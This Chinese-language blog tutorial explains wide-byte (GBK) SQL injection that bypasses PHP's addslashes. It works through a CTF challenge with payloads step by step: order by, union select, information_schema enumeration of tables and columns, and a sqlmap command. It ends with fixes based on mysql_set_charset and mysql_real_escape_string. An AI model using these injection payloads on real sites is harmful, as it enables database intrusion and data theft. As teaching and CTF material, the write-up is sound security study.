0x01 前言
准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点。
在计算机中,字符的表示与存储都离不开编码。例如ASCII,utf-8,gbk2312等。通常字符的表示都只需1字节。但也有如gbk2312这种需要2字节来表示的编码格式,这种我们称之为宽字节。
所谓宽字节注入,可能存在于以gbk编码存储数据的sql数据库中。在实际站点中已经比较少见(常见于学校远古破站),而且修复方案很简单。在CTF中属于入门的sql注入题目。
0x02 宽字节注入原理分析
0x01 认识addslashes
在基于php对sql注入的防御里,总会提到这个函数。
addslashes ( string $str ) : string
在php官方文档中,对该函数的说明如下:
返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线()与 NUL(NULL 字符)。
举例:
对于最简单的字符型数字型注入,经改函数转义的sql语句确实会“卡死“单引号。(构造攻击的sql语句不会执行)
但对于该函数的绕过,其实并不困难,无非两点:
1.在前面再加一个(或单数个),变成( '),可以导致被转义,从而让‘逃出限制。
2.把弄没。**
在下面的例子中你可以体会到,若是该数据库采用了宽字节的编码,这个函数就变成了纸老虎。
0x02 宽字节注入原理
宽字节注入利用了mysql一个特性,即当mysql在使用GBK编码的时候,会认为两个字符是一个汉字。(前一个ASCII码要大于128,才到汉字的范围)
先了解一下这些字符的url编码:
当输入单引号,经addslashes转义后,对应的url编码是:
‘ --> \' --> %5C%27
当在前面引入一个ASCII大于128的字符(比如%df),url编码变为:
%df --> %df \ ' --> (%df%5C)%27
若使用gbk编码的话,%df%5C会被当作一个汉字处理,从而使%27(单引号)逃出生天,成功绕过
我们用url编码来研究一下:
当使用gbk编码,可以看到一个汉字占了2个字节。
来对\'编码一下:
现在在前面加上%df,可以看到%df%5C被当成了汉字,单引号成功逃脱:
0x03 宽字节注入利用释例
这里以南邮ctf(CG CTF)一道Web题:SQL-GBK为例。
输入id=1',可以看到’被变成了\',是addslashes
函数转义的结果。
用上文讲到的方法,构造id=1%df',id=1%aa',成功报错
下面可以就是常规的手工注入了,不太清楚的可以参考网上一些文章,如:https://blog.csdn.net/Litbai_zhang/article/details/83869918
首先构造order by语句尝试获得列数,注意最后要用闭合(注释掉后面的语句,不让其影响构造语句执行)
常见的闭合手段有:井号,--+等。
这里用井号,用%23来表示,否则可能解析不了
?id=1%aa' order by 2 %23
3已经报错了,可以知道列数(字段数)为2.
继续用union来判断数据的显示位置:
对于这一步有一篇文章写的很好,推荐一下:https://blog.csdn.net/weixin_44840696/article/details/89166154
?id=999%aa' union select 1,2 %23
知道了回显的位置是2.
下一步,把2改成database(),成功获取库名:sae-chinalover
?id=999%aa' union select 1,database() %23
继续跟进,查表名。(不放链接了,不太清楚可以百度下mysql自身的系统库结构与读取信息的函数):
注意:因为单引号会被转义,所以直接令table_schema=库名是行不通的。
?id=999%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sae-chinalover' %23
可以把库名代替为database()。成功获取表名。
?id=999%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() %23
下一步爆字段,把四个表的字段依次爆一遍,在ctf4中发现有flag字段:
?id=999%aa' union select 1,group_concat(column_name) from information_schema.columns where table_name = 0x63746634 %23
查询一下,成功获取flag。
顺便一题,这道题目也可以用sqlmap直接跑。把你构造的宽字符绕过语句扔上去就行了。以爆库名为例:
sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%aa%27" --current-db
0x04 宽字节注入的防御
对于宽字节注入,有一种最好的修补就是:
(1)使用mysql_set_charset(GBK)
指定字符集
(2)使用mysql_real_escape_string
进行转义
mysql_real_escape_string
与addslashes
的不同之处在于其会考虑当前设置的字符集。不会出现把%aa%5c拼接为一个宽字节的问题。
所以用mysql_set_charset
对当前字符集进行指定,然后转义即可。